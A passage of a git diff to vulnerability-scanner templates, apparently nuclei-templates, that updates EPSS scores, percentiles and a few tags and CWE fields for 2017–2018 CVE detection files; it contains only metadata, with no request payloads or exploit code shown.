b/http/cves/2017/CVE-2017-17451.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.54328 + epss-percentile: 0.54756 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 0f15b649b6..13b74efb06 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-17562 cwe-id: CWE-20 epss-score: 0.9747 - epss-percentile: 0.99941 + epss-percentile: 0.99952 cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:* metadata: max-request: 65 diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index d44999c3d3..7f9f05ce0e 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-17731 cwe-id: CWE-89 epss-score: 0.14043 - epss-percentile: 0.94965 + epss-percentile: 0.95048 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 1df0e340a4..34aead6db8 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17736 cwe-id: CWE-425 epss-score: 0.1483 - epss-percentile: 0.95082 + epss-percentile: 0.95161 cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 4d9c0bea4e..da0713ff7b 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.00072 - epss-percentile: 0.29644 + epss-percentile: 0.29992 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 7834cba252..c5503c44c7 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36469 + epss-percentile: 0.36841 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 659b3de1c1..959585af27 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18598 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.38904 + epss-percentile: 0.39267 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 21366ae735..caa3d41830 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18638 cwe-id: CWE-918 epss-score: 0.00902 - epss-percentile: 0.80714 + epss-percentile: 0.80923 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 3cb9a64175..ff30496ee4 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.4 cve-id: CVE-2017-3506 epss-score: 0.96927 - epss-percentile: 0.99602 + epss-percentile: 0.9962 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 7453123227..28bcc591a8 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.00865 - epss-percentile: 0.80229 + epss-percentile: 0.80454 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index 855f454857..ba5f16e5ff 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-5487 cwe-id: CWE-200 epss-score: 0.97179 - epss-percentile: 0.99719 + epss-percentile: 0.99741 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 8116c4b40c..a693e35a24 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-5521 cwe-id: CWE-200 epss-score: 0.97402 - epss-percentile: 0.99876 + epss-percentile: 0.99897 cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 980f4583c9..a6c7ab9125 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.64713 + epss-percentile: 0.65113 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index fe34d7b79d..951dfc430c 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -19,8 +19,8 @@ info: cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 - epss-score: 0.9756 - epss-percentile: 0.99995 + epss-score: 0.97554 + epss-percentile: 0.99994 cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 42d76fe036..68c48ee5eb 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2017-5689 epss-score: 0.97416 - epss-percentile: 0.99888 + epss-percentile: 0.99903 cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index a4109af385..c3df01b330 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-5982 cwe-id: CWE-22 epss-score: 0.0488 - epss-percentile: 0.91748 + epss-percentile: 0.91862 cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index ad9d44c25e..b2f48a16f1 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 - epss-score: 0.97282 - epss-percentile: 0.9978 + epss-score: 0.9726 + epss-percentile: 0.99789 cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index a9eebf6dc0..9ec1a0ce43 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-7269 cwe-id: CWE-119 epss-score: 0.97156 - epss-percentile: 0.99699 + epss-percentile: 0.9973 cpe: cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index a412afca87..62ae933b09 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7391 cwe-id: CWE-79 epss-score: 0.00204 - epss-percentile: 0.57588 + epss-percentile: 0.57979 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index ec84f3b87d..1590cc2580 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -24,7 +24,7 @@ info: cve-id: CVE-2017-7615 cwe-id: CWE-640 epss-score: 0.97404 - epss-percentile: 0.9988 + epss-percentile: 0.99898 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index d2751a37e8..5989ad72e8 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -17,8 +17,8 @@ info: cvss-score: 10 cve-id: CVE-2017-7921 cwe-id: CWE-287 - epss-score: 0.01169 - epss-percentile: 0.83195 + epss-score: 0.01361 + epss-percentile: 0.84703 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 7b8506b36e..693f2c36e4 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7925 cwe-id: CWE-522,CWE-260 epss-score: 0.35031 - epss-percentile: 0.96568 + epss-percentile: 0.96614 cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index af99f1723e..5187a7b854 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-8229 cwe-id: CWE-255 - epss-score: 0.95016 - epss-percentile: 0.99003 + epss-score: 0.94037 + epss-percentile: 0.98875 cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: ipm-721s_firmware shodan-query: html:"Amcrest" fofa-query: "Amcrest" - tags: packetstorm,cve,cve2017,amcrest,iot + tags: packetstorm,seclists,cve,cve2017,amcrest,iot http: - method: GET diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 292621cc25..5f8b70f663 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-8917 cwe-id: CWE-89 epss-score: 0.97555 - epss-percentile: 0.99994 + epss-percentile: 0.99995 cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 5a4c1c5a99..064db563db 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9140 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58217 + epss-percentile: 0.58623 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 7e6d60efa0..1aa15e806e 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-9288 cwe-id: CWE-79 epss-score: 0.00168 - epss-percentile: 0.53128 + epss-percentile: 0.53527 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 3dbdc00570..7c08920046 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.01037 - epss-percentile: 0.82064 + epss-percentile: 0.82234 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 68eefb538b..cd2a71c16d 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9506 cwe-id: CWE-918 epss-score: 0.00575 - epss-percentile: 0.7516 + epss-percentile: 0.7544 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 50bc3adfb5..dd4d15ef50 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-9791 cwe-id: CWE-20 - epss-score: 0.97478 - epss-percentile: 0.99948 + epss-score: 0.97448 + epss-percentile: 0.99936 cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 23bbcfe5a3..ab8bb1b932 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 - epss-score: 0.97548 - epss-percentile: 0.99992 + epss-score: 0.97556 + epss-percentile: 0.99995 cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 9fc4e4cbf3..7ab8bdd6a5 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 - epss-score: 0.97106 - epss-percentile: 0.99673 + epss-score: 0.96098 + epss-percentile: 0.99307 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index d74e09f052..e908de0700 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-9833 cwe-id: CWE-22 - epss-score: 0.48044 - epss-percentile: 0.97006 + epss-score: 0.35156 + epss-percentile: 0.96618 cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index 1e43e0049a..d8ffbdee04 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-9841 cwe-id: CWE-94 - epss-score: 0.97488 - epss-percentile: 0.99954 + epss-score: 0.97477 + epss-percentile: 0.9996 cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 5baf5b4d69..9982243f56 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 - cwe-id: CWE-200,CWE-306 - epss-score: 0.0948 - epss-percentile: 0.93961 + cwe-id: CWE-306,CWE-200 + epss-score: 0.09982 + epss-percentile: 0.94216 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index a4355ca662..c2d64739c8 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-0296 cwe-id: CWE-22,CWE-20 epss-score: 0.97446 - epss-percentile: 0.99918 + epss-percentile: 0.99934 cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 4ff853ba46..abf772eebb 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.60647 + epss-percentile: 0.61029 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 46e4c5a9ac..66d9ceec10 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.89191 - epss-percentile: 0.98305 + epss-percentile: 0.98378 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 820ac1157d..493bee4db7 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-1000226 cwe-id: CWE-732 epss-score: 0.01552 - epss-percentile: 0.85554 + epss-percentile: 0.85693 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index 35ac6cc1d6..7507e478ef 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-1000533 cwe-id: CWE-20 epss-score: 0.97207 - epss-percentile: 0.99732 + epss-percentile: 0.99756 cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 10d5e286d1..2a85a1da69 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1000600 cwe-id: CWE-200 epss-score: 0.95579 - epss-percentile: 0.99139 + epss-percentile: 0.99184 cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 4c166e0a86..9a5cfafc1c 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-1000671 cwe-id: CWE-601 - epss-score: 0.00831 - epss-percentile: 0.79859 + epss-score: 0.00745 + epss-percentile: 0.78789 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 04f08ba604..9da194bd56 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-1000856 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.40768 + epss-percentile: 0.41069 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index fbd4a11343..b169ad5b1a 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - epss-score: 0.97412 - epss-percentile: 0.99884 + epss-score: 0.97145 + epss-percentile: 0.9972 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index f9e1a8ec28..082e25cbdc 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10093 cwe-id: CWE-862 epss-score: 0.06287 - epss-percentile: 0.92688 + epss-percentile: 0.92786 cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index 8a11077dbd..baecec8a71 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-10095 cwe-id: CWE-79 epss-score: 0.95296 - epss-percentile: 0.99069 + epss-percentile: 0.99114 cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 653f661ca5..f838943069 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46484 + epss-percentile: 0.46815 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 9059365187..0094fb91ca 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10201 cwe-id: CWE-22 - epss-score: 0.063 - epss-percentile: 0.92695 + epss-score: 0.04525 + epss-percentile: 0.91535 cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 861e184639..5e1ac759f3 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-10230 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.45743 + epss-percentile: 0.46119 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 3fc4a67e12..afc6529c61 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-10562 cwe-id: CWE-78 - epss-score: 0.97576 - epss-percentile: 0.99999 + epss-score: 0.97533 + epss-percentile: 0.9999 cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index fb52a5ef1c..f2083db3a4 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10822 cwe-id: CWE-22 - epss-score: 0.17386 - epss-percentile: 0.95419 + epss-score: 0.12286 + epss-percentile: 0.94762 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index af1b49c7d2..5c474a8e6a 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 - epss-score: 0.96863 - epss-percentile: 0.99564 + epss-score: 0.96827 + epss-percentile: 0.99566 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 063588bf3e..3766e9eb2f 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10956 cwe-id: CWE-22 epss-score: 0.65072 - epss-percentile: 0.97442 + epss-percentile: 0.97506 cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 0d602eaf9b..b0dc8fc7c0 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-11227 cwe-id: CWE-79 epss-score: 0.02667 - epss-percentile: 0.89064 + epss-percentile: 0.89205 cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index 71ebf9e7b3..1c814d4bbe 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11231 cwe-id: CWE-89 epss-score: 0.00903 - epss-percentile: 0.80727 + epss-percentile: 0.80937 cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index b5118a2e4c..977e56cd98 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - epss-score: 0.95758 - epss-percentile: 0.99181 + epss-score: 0.9461 + epss-percentile: 0.98979 cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 9510ab55b3..b36f9c1093 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11473 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.39898 + epss-percentile: 0.40221 cpe: 